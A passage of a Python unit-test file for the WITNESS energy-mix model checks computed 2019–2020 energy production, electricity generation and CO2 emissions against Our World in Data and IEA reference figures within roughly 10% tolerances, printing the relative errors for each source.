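        self.assertGreaterEqual(computed, reference * (1.0 - rel_tol))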
# def test_01_check_global_production_values(self):
# '''
# Test order of magnitude of raw energy production with values from ourworldindata
# https://ourworldindata.org/energy-mix?country=
#
# '''
# self.ee.execute()
#
# # These emissions are in Gt
# energy_production = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.energy_production_brut_detailed')
#
# '''
    #         Theory in 2019 from ourworldindata expressed in TWh (2020 is a covid year).
    #         We need to subtract energy own use to get the same hypothesis as our models
    #         (energy own use is subtracted from raw production).
# '''
# oil_product_production = 49472. - 2485.89
# wind_production = 1590.19 # in 2020
# nuclear_production = 2616.61
# hydropower_production = 4355.
# trad_biomass_production = 13222.
# other_renew_production = 1614.
# modern_biofuels_production = 1043. # in 2020
# # in 2020
# # https://ourworldindata.org/renewable-energy#solar-energy-generation
# solar_production = 844.37
# coal_production = 43752. - 952.78
# gas_production = 39893. - 3782.83
# total_production = 171240.
#
# '''
# Oil production
# '''
#
# computed_oil_production = energy_production['production fuel.liquid_fuel (TWh)'].loc[
# energy_production['years'] == 2020].values[0]
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_oil_production,
# oil_product_production * 1.1)
# self.assertGreaterEqual(
# computed_oil_production, oil_product_production * 0.9)
#
# '''
# Gas production
# '''
# fossil_gas_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.methane.FossilGas.techno_production')
# computed_gas_production = fossil_gas_prod['methane (TWh)'].loc[
# fossil_gas_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_gas_production,
# gas_production * 1.1)
# self.assertGreaterEqual(
# computed_gas_production, gas_production * 0.9)
#
# '''
# Coal production
# '''
# coal_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.solid_fuel.CoalExtraction.techno_production')
# computed_coal_production = coal_prod['solid_fuel (TWh)'].loc[
# coal_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_coal_production,
# coal_production * 1.1)
# self.assertGreaterEqual(
# computed_coal_production, coal_production * 0.9)
#
# '''
    #         Biomass production: the value is traditional biomass consumption, but we do not consume all the biomass that we can produce.
# Waiting for a specific value to compare
# '''
# #
# computed_biomass_production = energy_production['production biomass_dry (TWh)'].loc[
# energy_production['years'] == 2020].values[0]
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_biomass_production,
# trad_biomass_production * 1.1)
# self.assertGreaterEqual(
# computed_biomass_production, trad_biomass_production * 0.9)
#
# '''
# Biofuel production
# '''
#
# computed_biodiesel_production = energy_production['production fuel.biodiesel (TWh)'].loc[
# energy_production['years'] == 2020].values[0]
#
# computed_biogas_production = energy_production['production biogas (TWh)'].loc[
# energy_production['years'] == 2020].values[0]
#
# computed_biofuel_production = computed_biodiesel_production + \
# computed_biogas_production
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_biofuel_production,
# modern_biofuels_production * 1.1)
# # we compare in TWh and must be near 30% of error because some biofuels
# # are missing
# self.assertGreaterEqual(
# computed_biofuel_production, modern_biofuels_production * 0.7)
#
# '''
# Solar production
# '''
# elec_solar_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.SolarPv.techno_production')
#
# elec_solarth_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.SolarThermal.techno_production')
#
# computed_solar_production = elec_solar_prod['electricity (TWh)'].loc[
# elec_solar_prod['years'] == 2020].values[0] * 1000.0 + \
# elec_solarth_prod['electricity (TWh)'].loc[
# elec_solarth_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_solar_production,
# solar_production * 1.1)
# self.assertGreaterEqual(
# computed_solar_production, solar_production * 0.9)
#
# '''
# Wind production
# '''
# elec_windonshore_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.WindOnshore.techno_production')
# elec_windoffshore_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.WindOffshore.techno_production')
#
# computed_wind_production = elec_windonshore_prod['electricity (TWh)'].loc[
# elec_windonshore_prod['years'] == 2020].values[0] * 1000.0 + \
# elec_windoffshore_prod['electricity (TWh)'].loc[
# elec_windoffshore_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_wind_production,
# wind_production * 1.1)
# self.assertGreaterEqual(
# computed_wind_production, wind_production * 0.9)
#
# '''
# Nuclear production
# '''
# elec_nuclear_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.Nuclear.techno_production')
#
# computed_nuclear_production = elec_nuclear_prod['electricity (TWh)'].loc[
# elec_nuclear_prod['years'] == 2020].values[0] * 1000.0
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_nuclear_production,
# nuclear_production * 1.1)
# self.assertGreaterEqual(
# computed_nuclear_production, nuclear_production * 0.9)
#
# '''
# Hydropower production
# '''
# elec_hydropower_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.electricity.Hydropower.techno_production')
#
# computed_hydropower_production = elec_hydropower_prod['electricity (TWh)'].loc[
# elec_hydropower_prod['years'] == 2020].values[0] * 1000
#
# # we compare in TWh and must be near 10% of error
# self.assertLessEqual(computed_hydropower_production,
# hydropower_production * 1.1)
# self.assertGreaterEqual(
# computed_hydropower_production, hydropower_production * 0.9)
def test_02_check_global_co2_emissions_values(self):
'''
Test order of magnitude of co2 emissions with values from ourworldindata
https://ourworldindata.org/emissions-by-fuel
'''
self.ee.execute()
        # These emissions are in Mt
co2_emissions_by_energy = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.co2_emissions_by_energy')
'''
        Theory in 2020 from ourworldindata expressed in Mt
'''
oil_co2_emissions = 11.07e3 # expressed in Mt
coal_co2_emissions = 13.97e3 # expressed in Mt
gas_co2_emissions = 7.4e3 # expressed in Mt
        total_co2_emissions = 34.81e3  # expressed in Mt (i.e. 34.81 Gt)
'''
        Methane CO2 emissions are emissions from methane energy + gas turbines
        (GasTurbine and CombinedCycleGasTurbine) from electricity + 75% of
        WaterGasShift flue gas
'''
elec_gt_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.GasTurbine.techno_detailed_production')
elec_cgt_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.CombinedCycleGasTurbine.techno_detailed_production')
wgs_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.hydrogen.gaseous_hydrogen.WaterGasShift.techno_detailed_production')
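        # Assumption on attribution: the WaterGasShift flue gas is split
        # between feedstocks, 75% to methane (presumably the steam methane
        # reforming route) and 25% to coal (coal gasification route), matching
        # the 0.75 factor below and the 0.25 factor in the coal computation.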
computed_methane_co2_emissions = co2_emissions_by_energy['methane'].loc[co2_emissions_by_energy['years'] == 2020].values[0] + \
elec_gt_prod['CO2 from Flue Gas (Mt)'].loc[elec_gt_prod['years']
== 2020].values[0] +\
            elec_cgt_prod['CO2 from Flue Gas (Mt)'].loc[elec_cgt_prod['years']
                                                        == 2020].values[0] +\
wgs_prod['CO2 from Flue Gas (Mt)'].loc[wgs_prod['years']
== 2020].values[0] * 0.75
# we compare in Mt and must be near 10% of error
self.assertLessEqual(computed_methane_co2_emissions,
gas_co2_emissions * 1.1)
self.assertGreaterEqual(
computed_methane_co2_emissions, gas_co2_emissions * 0.9)
print(
            f'Methane CO2 emissions : ourworldindata {gas_co2_emissions} Mt vs WITNESS {computed_methane_co2_emissions} Mt')
'''
        Coal CO2 emissions are emissions from coal energy + CoalGen from
        electricity + 25% of WaterGasShift flue gas
'''
elec_coal_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.CoalGen.techno_detailed_production')
computed_coal_co2_emissions = co2_emissions_by_energy['solid_fuel'].loc[co2_emissions_by_energy['years'] == 2020].values[0] + \
elec_coal_prod['CO2 from Flue Gas (Mt)'].loc[elec_coal_prod['years']
== 2020].values[0] +\
wgs_prod['CO2 from Flue Gas (Mt)'].loc[wgs_prod['years']
== 2020].values[0] * 0.25
# we compare in Mt and must be near 10% of error
self.assertLessEqual(computed_coal_co2_emissions,
coal_co2_emissions * 1.1)
self.assertGreaterEqual(
computed_coal_co2_emissions, coal_co2_emissions * 0.9)
print(
            f'Coal CO2 emissions : ourworldindata {coal_co2_emissions} Mt vs WITNESS {computed_coal_co2_emissions} Mt')
'''
Oil CO2 emissions are emissions from oil energy
'''
computed_oil_co2_emissions = co2_emissions_by_energy['fuel.liquid_fuel'].loc[
co2_emissions_by_energy['years'] == 2020].values[0]
# we compare in Mt and must be near 10% of error
self.assertLessEqual(computed_oil_co2_emissions,
oil_co2_emissions * 1.1)
self.assertGreaterEqual(
computed_oil_co2_emissions, oil_co2_emissions * 0.9)
print(
            f'Oil CO2 emissions : ourworldindata {oil_co2_emissions} Mt vs WITNESS {computed_oil_co2_emissions} Mt')
'''
        Total CO2 emissions are the sum of all CO2 sources minus the CO2
        removed by the energy mix (values in Gt, converted to Mt below)
'''
        sources = self.ee.dm.get_value(
            f'{self.name}.CCUS.CO2_emissions_by_use_sources')
        sinks = self.ee.dm.get_value(f'{self.name}.CCUS.CO2_emissions_by_use_sinks')[
            'CO2_resource removed by energy mix (Gt)'].values[0]
sources_sum = sources.loc[sources['years'] == 2020][[
col for col in sources.columns if col != 'years']].sum(axis=1)[0]
computed_total_co2_emissions = (sources_sum - sinks) * 1000
# we compare in Mt and must be near 10% of error
print(
            f'Total CO2 emissions : ourworldindata {total_co2_emissions} Mt vs WITNESS {computed_total_co2_emissions} Mt')
self.assertLessEqual(computed_total_co2_emissions,
total_co2_emissions * 1.1)
self.assertGreaterEqual(
computed_total_co2_emissions, total_co2_emissions * 0.9)
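    # test_03 below repeatedly computes a relative error in percent before
    # printing it. The static helper below is a minimal sketch of that formula,
    # added for readability; it is not called by the original tests.
    @staticmethod
    def _relative_error_pct(reference, computed):
        """Relative error in percent: |reference - computed| / reference * 100."""
        return np.abs(reference - computed) / reference * 100.0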
def test_03_check_net_production_values(self):
'''
Test order of magnitude of net energy production with values from Energy Balances IEA 2019:
Source: IEA 2022, Data Tables, https://www.iea.org/data-and-statistics/data-tables?country=WORLD&energy=Balances&year=2019,
License: CC BY 4.0.
'''
self.ee.execute()
        # These productions are in TWh
net_energy_production = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.energy_production_detailed')
energy_production = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.energy_production_brut_detailed')
'''
Theory in 2019 from Energy Balances IEA 2019 expressed in TWh
'''
'''
Coal balances
'''
print('---------- Coal balances -------------')
coal_energy_own_use = 952.78
print(
f'Energy own use for coal production is {coal_energy_own_use} TWh and now taken into account into raw production')
        energy_production_raw_coal_iea = 46666 - coal_energy_own_use  # TWh
coal_raw_prod = energy_production['production solid_fuel (TWh)'][0]
error_coalraw_prod = np.abs(
energy_production_raw_coal_iea - coal_raw_prod) / energy_production_raw_coal_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('coal raw production error : ', error_coalraw_prod, ' %',
f'IEA :{energy_production_raw_coal_iea} TWh vs WITNESS :{coal_raw_prod} TWh')
# elec plants needs
elec_plants = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.electricity.energy_consumption')[
'solid_fuel (TWh)'][0] * 1000.0
elec_plants_coal_IEA = 20194.44 # TWh
error_elec_plants = np.abs(
elec_plants_coal_IEA - elec_plants) / elec_plants_coal_IEA * 100.0
# we compare in TWh and must be near 10% of error
self.assertLessEqual(error_elec_plants,
10.0)
print('coal used by electricity plants error : ', error_elec_plants, ' %',
f'IEA :{elec_plants_coal_IEA} TWh vs WITNESS :{elec_plants} TWh')
# syngas plants needs
syngas_plants = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.syngas.energy_consumption')[
'solid_fuel (TWh)'][0] * 1000.0
liquefaction_plants_coal_IEA = 264.72 # TWh
error_syngas_plants = np.abs(
liquefaction_plants_coal_IEA - syngas_plants) / liquefaction_plants_coal_IEA * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_syngas_plants,
# 10.0)
print('coal used by syngas plants error : ', error_syngas_plants, ' %',
f'IEA :{liquefaction_plants_coal_IEA} TWh vs WITNESS :{syngas_plants} TWh')
coal_used_by_energy = energy_production[
'production solid_fuel (TWh)'][0] - net_energy_production[
'production solid_fuel (TWh)'][0]
        # CHP plants and heat plants technology not implemented
chp_plants = 8222.22 + 289 # TWh
print('CHP and heat plants not implemented corresponds to ',
chp_plants / coal_used_by_energy * 100.0, ' % of coal used by energy : ', chp_plants, ' TWh')
# coal to gas technology not implemented
        gas_works = 196.11 # TWh
print('Coal to gas plants not implemented corresponds to ',
gas_works / coal_used_by_energy * 100.0, ' % of coal used by energy')
coal_total_final_consumption = net_energy_production[
'production solid_fuel (TWh)'][0]
coal_total_final_consumption_iea = 11055 # TWH
error_coalnet_prod = np.abs(
coal_total_final_consumption_iea - coal_total_final_consumption) / coal_total_final_consumption_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('coal net production error : ', error_coalnet_prod, ' %',
f'IEA :{coal_total_final_consumption_iea} TWh vs WITNESS :{coal_total_final_consumption} TWh')
print('CHP and heat plants not taken into account for coal consumption explains the differences')
'''
Gas balances
'''
print('---------- Gas balances -------------')
energy_own_use = 3732.83
print('Energy industry own use covers the amount of fuels used by the energy producing industries (e.g. for heating, lighting and operation of all equipment used in the extraction process, for traction and for distribution)')
print(
            f'Energy own use for methane production is {energy_own_use} TWh and is now taken into account in the raw production')
energy_production_raw_gas_iea = 40000 - energy_own_use # TWH
gas_raw_prod = energy_production['production methane (TWh)'][0]
error_gasraw_prod = np.abs(
energy_production_raw_gas_iea - gas_raw_prod) / energy_production_raw_gas_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('gas raw production error : ', error_gasraw_prod, ' %',
f'IEA :{energy_production_raw_gas_iea} TWh vs WITNESS :{gas_raw_prod} TWh')
# elec plants needs
elec_plants = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.electricity.energy_consumption')[
'methane (TWh)'][0] * 1000.0
elec_plants_gas_IEA = 10833.33 # TWh
chp_plants_iea = 3887.05 + 709 # TWh
error_elec_plants = np.abs(
elec_plants_gas_IEA - elec_plants) / elec_plants_gas_IEA * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_elec_plants,
# 10.0)
print('gas used by electricity plants error : ',
error_elec_plants, ' %',
f'IEA :{elec_plants_gas_IEA } TWh vs WITNESS :{elec_plants} TWh')
methane_used_by_energy = energy_production[
'production methane (TWh)'][0] - net_energy_production[
'production methane (TWh)'][0]
print('CHP and heat plants not implemented corresponds to ',
chp_plants_iea / methane_used_by_energy * 100.0, ' % of methane used by energy : ', chp_plants_iea, ' TWh')
# syngas plants needs
syngas_plants = self.ee.dm.get_value(f'{self.name}.{self.energymixname}.syngas.energy_consumption')[
'methane (TWh)'][0] * 1000.0
liquefaction_plants_methane_IEA = 202.74 # TWh
other_transformation = 277.5 # TWH
        # other transformation includes the transformation of natural gas for
# hydrogen manufacture
error_syngas_plants = np.abs(
liquefaction_plants_methane_IEA + other_transformation - syngas_plants) / liquefaction_plants_methane_IEA * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_syngas_plants,
# 10.0)
print('methane used by syngas plants error : ',
error_syngas_plants, ' %',
f'IEA :{liquefaction_plants_methane_IEA + other_transformation} TWh vs WITNESS :{syngas_plants} TWh')
methane_total_final_consumption = net_energy_production[
'production methane (TWh)'][0]
methane_total_final_consumption_iea = 19001 # TWH
error_methanenet_prod = np.abs(
methane_total_final_consumption_iea - methane_total_final_consumption) / methane_total_final_consumption_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('methane net production error : ', error_methanenet_prod, ' %',
f'IEA :{methane_total_final_consumption_iea} TWh vs WITNESS :{methane_total_final_consumption} TWh')
print('CHP and heat plants not taken into account for methane consumption explains some differences')
'''
Electricity balances
'''
print('---------- Electricity balances -------------')
net_elec_prod = net_energy_production[
'production electricity (TWh)'][0]
net_elec_prod_iea = 22847.66 # TWh
error_net_elec_prod = np.abs(
net_elec_prod_iea - net_elec_prod) / net_elec_prod_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('Net electricity production error : ', error_net_elec_prod, ' %',
f'IEA :{net_elec_prod_iea} TWh vs WITNESS :{net_elec_prod} TWh')
energy_production_raw_hydro_iea = 4222.22 # TWH
elec_hydropower_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.Hydropower.techno_production')
computed_hydropower_production = elec_hydropower_prod['electricity (TWh)'].loc[
elec_hydropower_prod['years'] == 2020].values[0] * 1000
error_hydropowerraw_prod = np.abs(
energy_production_raw_hydro_iea - computed_hydropower_production) / energy_production_raw_hydro_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_coalnet_prod,
# 10.0)
print('hydropower raw production error : ', error_hydropowerraw_prod, ' %',
f'IEA :{energy_production_raw_hydro_iea} TWh vs WITNESS :{computed_hydropower_production} TWh')
energy_production_raw_wind_iea = 1427.41 # TWH
elec_windonshore_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.WindOnshore.techno_production')
elec_windoffshore_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.WindOffshore.techno_production')
computed_wind_production = elec_windonshore_prod['electricity (TWh)'].loc[
elec_windonshore_prod['years'] == 2020].values[0] * 1000.0 + \
elec_windoffshore_prod['electricity (TWh)'].loc[
elec_windoffshore_prod['years'] == 2020].values[0] * 1000.0
error_wind_prod = np.abs(
energy_production_raw_wind_iea - computed_wind_production) / energy_production_raw_wind_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_wind_prod,
# 10.0)
print('Wind raw production error : ', error_wind_prod, ' %',
f'IEA :{energy_production_raw_wind_iea} TWh vs WITNESS :{computed_wind_production} TWh')
elec_solar_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.SolarPv.techno_production')
computed_solarpv_production = elec_solar_prod['electricity (TWh)'].loc[
elec_solar_prod['years'] == 2020].values[0] * 1000
energy_production_solarpv_iea = 680.9 # TWh
error_solarpv_prod = np.abs(
energy_production_solarpv_iea - computed_solarpv_production) / energy_production_solarpv_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Solar PV raw production error : ', error_solarpv_prod, ' %',
f'IEA :{energy_production_solarpv_iea} TWh vs WITNESS :{computed_solarpv_production} TWh')
elec_solarth_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.SolarThermal.techno_production')
computed_solarth_production = elec_solarth_prod['electricity (TWh)'].loc[
elec_solarth_prod['years'] == 2020].values[0] * 1000
energy_production_solarth_iea = 13.36 # TWh
error_solarth_prod = np.abs(
energy_production_solarth_iea - computed_solarth_production) / energy_production_solarth_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Solar Thermal raw production error : ', error_solarth_prod, ' %',
f'IEA :{energy_production_solarth_iea} TWh vs WITNESS :{computed_solarth_production} TWh')
elec_geoth_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.Geothermal.techno_production')
computed_geoth_production = elec_geoth_prod['electricity (TWh)'].loc[
elec_geoth_prod['years'] == 2020].values[0] * 1000.0
energy_production_geoth_iea = 91.09 # TWh
error_geoth_prod = np.abs(
energy_production_geoth_iea - computed_geoth_production) / energy_production_geoth_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Geothermal raw production error : ', error_geoth_prod, ' %',
f'IEA :{energy_production_geoth_iea} TWh vs WITNESS :{computed_geoth_production} TWh')
elec_coalgen_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.CoalGen.techno_production')
computed_coalgen_production = elec_coalgen_prod['electricity (TWh)'].loc[
elec_coalgen_prod['years'] == 2020].values[0] * 1000.0
energy_production_coalgen_iea = 9914.45 # TWh
        error_coalgen_prod = np.abs(
            energy_production_coalgen_iea - computed_coalgen_production) / energy_production_coalgen_iea * 100.0
        # we compare in TWh and must be near 10% of error
        # self.assertLessEqual(error_coalgen_prod,
        # 10.0)
        print('Coal generation raw production error : ', error_coalgen_prod, ' %',
              f'IEA :{energy_production_coalgen_iea} TWh vs WITNESS :{computed_coalgen_production} TWh')
elec_oilgen_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.OilGen.techno_production')
computed_oilgen_production = elec_oilgen_prod['electricity (TWh)'].loc[
elec_oilgen_prod['years'] == 2020].values[0] * 1000.0
energy_production_oilgen_iea = 747 # TWh
error_oil_prod = np.abs(
energy_production_oilgen_iea - computed_oilgen_production) / energy_production_oilgen_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Oil generation raw production error : ', error_oil_prod, ' %',
f'IEA :{energy_production_oilgen_iea} TWh vs WITNESS :{computed_oilgen_production} TWh')
elec_gt_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.GasTurbine.techno_production')
elec_cgt_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.CombinedCycleGasTurbine.techno_production')
computed_gasgen_production = elec_gt_prod['electricity (TWh)'].loc[
elec_gt_prod['years'] == 2020].values[0] * 1000.0 + elec_cgt_prod['electricity (TWh)'].loc[
elec_cgt_prod['years'] == 2020].values[0] * 1000.0
energy_production_gasgen_iea = 6346 # TWh
error_gasgen_prod = np.abs(
energy_production_gasgen_iea - computed_gasgen_production) / energy_production_gasgen_iea * 100.0
# we compare in TWh and must be near 10% of error
# self.assertLessEqual(error_solarpv_prod,
# 10.0)
print('Gas generation raw production error : ', error_gasgen_prod, ' %',
f'IEA :{energy_production_gasgen_iea} TWh vs WITNESS :{computed_gasgen_production} TWh')
elec_nuclear_prod = self.ee.dm.get_value(
f'{self.name}.{self.energymixname}.electricity.Nuclear.techno_production')
computed_nuclear_production = elec_nuclear_prod['electricity (TWh)'].loc[
elec_nuclear_prod['years'] == 2020].values[0] * 1000.0
energy_production_nuclear_iea = 2789.69 # TWh
        error_nuclear_prod = np.abs(
            energy_production_nuclear_iea - computed_nuclear_production) / energy_production_nuclear_iea * 100.0
        # we compare in TWh and must be near 10% of error
        # self.assertLessEqual(error_nuclear_prod,
        # 10.0)
        print('Nuclear raw production error : ', error_nuclear_prod, ' %',
              f'IEA :{energy_production_nuclear_iea} TWh vs WITNESS :{computed_nuclear_production} TWh')
        energy_production_biofuelgen_iea = 542.56 # TWh
        print(
            f'Technology of electricity generation with biofuel ({energy_production_biofuelgen_iea} TWh) is not yet implemented')
'''
Biofuels and waste balances
'''
print('---------- Biomass dry balances -------------')
        print('We consider biomass_dry equal to the sum of primary solid biofuels (no municipal/industrial waste) but in the doc they do not consider crop residues')
biomass_dry_raw_prod_iea = (
48309940) / 3600 # TWh 1414648 + 1142420 +
biomass_dry_net_prod_iea = (36537355) / 3600 # TWh + 150882 + 519300
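        # IEA balances are reported in TJ; dividing by 3600 converts TJ to TWh (1 TWh = 3600 TJ)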
# managed_wood_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.biomass_dry.ManagedWood.techno_production')
#
# computed_managed_wood_prod = managed_wood_prod['biomass_dry (TWh)'].loc[
# managed_wood_prod['years'] == 2020].values[0] * 1000.0
#
# unmanaged_wood_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.biomass_dry.UnmanagedWood.techno_production')
#
# computed_unmanaged_wood_prod = unmanaged_wood_prod['biomass_dry (TWh)'].loc[
# unmanaged_wood_prod['years'] == 2020].values[0] * 1000.0
#
# crop_energy_prod = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.biomass_dry.CropEnergy.techno_production')
#
# computed_crop_energy_prod = crop_energy_prod['biomass_dry (TWh)'].loc[
# crop_energy_prod['years'] == 2020].values[0] * 1000.0
#
biomass_dry_net_prod = net_energy_production[
'production biomass_dry (TWh)'][0] # - computed_crop_energy_prod
#
biomass_dry_raw_prod = energy_production[
'production biomass_dry (TWh)'][0]
error_biomassdry_raw_prod = np.abs(
biomass_dry_raw_prod_iea - biomass_dry_raw_prod) / biomass_dry_raw_prod_iea * 100.0
print('Biomass dry raw production error : ', error_biomassdry_raw_prod, ' %',
f'IEA :{biomass_dry_raw_prod_iea} TWh vs WITNESS :{biomass_dry_raw_prod} TWh')
error_biomassdry_net_prod = np.abs(
biomass_dry_net_prod_iea - biomass_dry_net_prod) / biomass_dry_net_prod_iea * 100.0
print('Biomass dry net production error : ', error_biomassdry_net_prod, ' %',
f'IEA :{biomass_dry_net_prod_iea} TWh vs WITNESS :{biomass_dry_net_prod} TWh')
#
# biomass_dry_elec_plants = 3650996 / 3600 # TWh
# biomass_dry_chp_plants = (2226110 + 324143) / 3600 # TWh
# biomass_dry_otherrtransf = 5220384 / 3600 # TWh
#
# print('CHP and heat plants using biomass are not implemented corresponds to ',
# biomass_dry_chp_plants / biomass_dry_raw_prod_iea * 100.0, ' % of biomass raw production : ', biomass_dry_chp_plants, ' TWh')
# print('Electricity plants using biomass are not implemented corresponds to ',
# biomass_dry_elec_plants / biomass_dry_raw_prod_iea * 100.0, ' % of biomass raw production : ', biomass_dry_elec_plants, ' TWh')
#
# biogas_cons = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.biogas.energy_consumption')
#
# biomass_by_biogas_cons = biogas_cons['wet_biomass (Mt)'].loc[
# biogas_cons['years'] == 2020].values[0] * 1000 * 3.6 # 3.6 is calorific value of biomass_dry
#
# syngas_cons = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.solid_fuel.energy_consumption')
#
# biomass_by_syngas_cons = syngas_cons['biomass_dry (TWh)'].loc[
# syngas_cons['years'] == 2020].values[0] * 1000
#
# solid_fuel_cons = self.ee.dm.get_value(
# f'{self.name}.{self.energymixname}.solid_fuel.energy_consumption')
#
# biomass_by_solid_fuel_cons = solid_fuel_cons['biomass_dry (TWh)'].loc[
# solid_fuel_cons['years'] == 2020].values[0] * 1000
#
# biomass_dry_otherrtransf_witness = biomass_by_solid_fuel_cons + biomass_by_syngas_cons
# biomass_dry_otherrtransf_with_ana = biomass_by_biogas_cons + \
# biomass_dry_otherrtransf_witness
#
# error_biomassdry_otherrtransf_prod = np.abs(
# biomass_dry_otherrtransf - biomass_dry_otherrtransf_witness) / biomass_dry_otherrtransf * 100.0
#
# print('Biomass dry other transformation production error : ', error_biomassdry_otherrtransf_prod, ' %',
# f'IEA :{biomass_dry_otherrtransf} TWh vs WITNESS :{biomass_dry_otherrtransf_witness} TWh')
#
# error_biomassdry_otherrtransf_with_ana_prod = np.abs(
# biomass_dry_otherrtransf - biomass_dry_otherrtransf_with_ana) / biomass_dry_otherrtransf * 100.0
#
# print('Biomass dry other transformation (adding anaerobic digestion) production error : ', error_biomassdry_otherrtransf_with_ana_prod, ' %',
# f'IEA :{biomass_dry_otherrtransf} TWh vs WITNESS with anaerobic
# digestion :{biomass_dry_otherrtransf_with_ana} TWh')
print('---------- liquid biofuels balances -------------')
        print('IEA biofuels include bioethanol (ethanol produced from biomass), biomethanol (methanol produced from biomass), bioETBE (ethyl-tertio-butyl-ether produced on the basis of bioethanol) and bioMTBE (methyl-tertio-butyl-ether produced on the basis of biomethanol)')
print('and biodiesel (a methyl-ester produced from vegetable or animal oil, of diesel quality), biodimethylether (dimethylether produced from biomass), Fischer Tropsch (Fischer Tropsch produced from biomass), cold pressed bio-oil (oil produced from oil seed through mechanical processing only) ')
raw_biodiesel_prod = energy_production[
'production fuel.biodiesel (TWh)'][0]
raw_hydrotreated_oil_fuel_prod = energy_production[
'production fuel.hydrotreated_oil_fuel (TWh)'][0]
raw_liquid_fuel = raw_biodiesel_prod + \
raw_hydrotreated_oil_fuel_prod
        liquidbiofuels_raw_prod_iea = 131224 * 1e6 * 11.9 / 1e9 # 131224 kt, converted to TWh at 11.9 kWh/kg
error_liquid_fuel_raw_prod = np.abs(
liquidbiofuels_raw_prod_iea - raw_liquid_fuel) / liquidbiofuels_raw_prod_iea * 100.0
print('Liquid fuels raw production error : ', error_liquid_fuel_raw_prod, ' %',
f'IEA :{liquidbiofuels_raw_prod_iea} TWh vs WITNESS :{raw_liquid_fuel} TWh')
print(
'A lot of biofuels are not implemented (no details of specific biofuels productions ')
print('---------- Biogases balances -------------')
print('In IEA, biogas are mainly gases from the anaerobic digestion but also can be produced from thermal processes (pyrolysis) or from syngas')
print('WITNESS model considers only anaerobic digestion')
raw_biogas_prod = energy_production[
'production biogas (TWh)'][0]
biogas_raw_prod_iea = 1434008 / 3600
error_biogas_raw_prod = np.abs(
biogas_raw_prod_iea - raw_biogas_prod) / biogas_raw_prod_iea * 100.0
print('Biogas raw production error : ', error_biogas_raw_prod, ' %',
f'IEA :{biogas_raw_prod_iea} TWh vs WITNESS :{raw_biogas_prod} TWh')
print(
f'Biogas is used in energy industry mainly for electricity plants {448717/3600} TWh and CHP plants {385127/3600} TWh')
print('These technologies are not yet implemented in WITNESS models, then :')
biogas_net_prod_iea = 521188 / 3600
net_biogas_prod = net_energy_production[
'production biogas (TWh)'][0]
error_biogas_net_prod = np.abs(
biogas_net_prod_iea - net_biogas_prod) / biogas_net_prod_iea * 100.0
